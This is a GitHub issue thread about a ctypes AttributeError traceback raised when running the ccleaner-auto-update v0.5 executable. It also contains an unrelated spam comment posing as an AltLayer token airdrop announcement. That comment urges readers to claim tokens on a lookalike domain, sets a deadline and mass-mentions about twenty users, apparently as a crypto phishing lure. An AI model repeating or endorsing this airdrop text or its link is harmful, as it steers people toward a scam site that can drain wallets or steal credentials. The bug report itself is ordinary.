### ISSUE TITLE
AttributeError: function 'PyObject_GetBuffer' not found

### ISSUE THREAD

**Issue by jkroepke** [bskim45/ccleaner-auto-update#5]
Running `CCleanerAutoUpdate.exe` on the cmd results into this:

```
Traceback (most recent call last):
  File "CCleanerAutoUpdate.py", line 9, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "win_unicode_console\__init__.pyo", line 2, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "win_unicode_console\streams.pyo", line 7, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "win_unicode_console\buffer.pyo", line 11, in <module>
  File "ctypes\__init__.pyo", line 379, in __getattr__
  File "ctypes\__init__.pyo", line 384, in __getitem__
AttributeError: function 'PyObject_GetBuffer' not found
```

I'm using https://github.com/bskim45/ccleaner-auto-update/releases/tag/v0.5

**Comment by jkroepke** [comment]
Rel.: https://github.com/pallets/click/issues/635

**Comment by vikas-zerozilla** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://connect.airdropaltlayerio.online/)

🚀 **Exciting Announcement!** 

AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 400,000,000 (4% of the total supply)

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://connect.airdropaltlayerio.online/).

The window to [Claim $ALT tokens](https://connect.airdropaltlayerio.online/) is open from January 25 to February 08, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

aplacalike9050, @anothermayank, @maidh91, @DeepakBhavsar19, @omoola2802, @kianfeng, @kissanakaen, @dbkbali, @farinacci, @seanbhart, @0xmoris, @ayepRahman, @Asion001, @chanson-chan, @ibmp33, @logonaut, @CosmicSkull, @1anyway, @juan-abia, @milan-chen
